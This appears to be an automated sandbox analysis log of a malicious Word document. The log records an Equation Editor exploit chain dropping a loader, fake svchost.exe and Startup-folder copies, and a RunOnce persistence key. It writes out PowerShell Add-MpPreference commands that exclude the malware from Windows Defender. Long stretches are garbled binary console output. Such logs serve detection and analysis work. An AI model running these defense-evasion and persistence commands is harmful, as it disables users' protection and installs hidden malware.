Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............@...............!.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......K.......................0.......G...............".......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............@...............g.......................0.......G.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............@.......................................0.......S.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............@.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............@.......................................0......._...............~.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............@.......P...............................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............@.......P...............................0.......k.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............@.......P...............................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............@.......P...............................0.......w.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@.......P...............................0.......................l.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@.......P...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............@...............>.......................0...............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@...............Y.......................0...............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......x.......P.......7.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......x...............u.......................0.......#.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......x.......L...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......x.......................................0......./.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......x.......L...............................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......x.......p.......,.......................0.......;.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......Z.......................0.......G.......x.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....T.......x.......p.......z.......................0.......G.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......x.......L...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......x.......p...............................0.......S.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....T.......x.......p...............................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....T.......x.......@.......'.......................0......._.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......x.......p.......\.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......x.......L...............................0.......k.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....T.......x.......L...............................0.......w.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......L.......+.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......p.......f.......................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......x.......p...............................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......p...............................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....d.......................S.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....d.......................q.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....d...............................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....d...............................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....d...............................................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....d...............P...............................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......D.......................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....d.......................m.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....d...............................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....d...............P...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....d...............................................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....d...............................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....d.......................g.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....d...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....d...............................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......................1.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......................d.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....d...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d...............P...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............t...............H.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............t...............}.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............t.......................................0......./.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............t.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............t...............'.......................0.......;...............|.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............t...............W.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............t.......................................0.......G.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............t.......................................0.......S.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............t.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............t...............:.......................0......._.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............t...............X.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............t.......................................0.......k.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............t.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............t.......................................0.......w.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t...............U.......................0.......................l.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t...............~.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............t.......................................0...............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t.......................................0...............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......................................0.......#.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......................................0......./.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8...............2.......................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8...............Y.......................0.......;.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.........{.....".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............8.......................................0.......G.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8.......................................0.......S.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8...............E.......................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8...............`.......................0......._.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........{.....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............8.......................................0.......w.........{.............................
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Allignright_companyprofile.doc ReversingLabs: Detection: 14%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: unknown Process created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: Allignright_companyprofile.doc Static file information: File size 2960089 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2536.6001966ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000005.00000002.2117946573.00000000003F3000.00000004.00000020.sdmp
Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2772.6004244ion.pdb source: powershell.exe, 00000009.00000002.2119685464.000000000037A000.00000004.00000020.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2124286114.0000000002AD0000.00000002.00000001.sdmp
Source: mad[1].exe.2.dr Static PE information: 0x84B8EC41 [Tue Jul 24 03:00:17 2040 UTC]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02863876 pushfd ; retf 0071h 5_2_02863881
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0288117C push 71CB3989h; retf 7_2_02881202
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_02BE0590 push edx; ret 32_2_02BE05B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_02BE0720 push esi; ret 32_2_02BE07EB

Persistence and Installation Behavior:

Drops PE files with benign system names
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe File created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
Drops executables to the windows directory (C:\Windows) and starts them
Source: unknown Executable created and started: C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe File created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6
Drops PE files to the startup folder
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
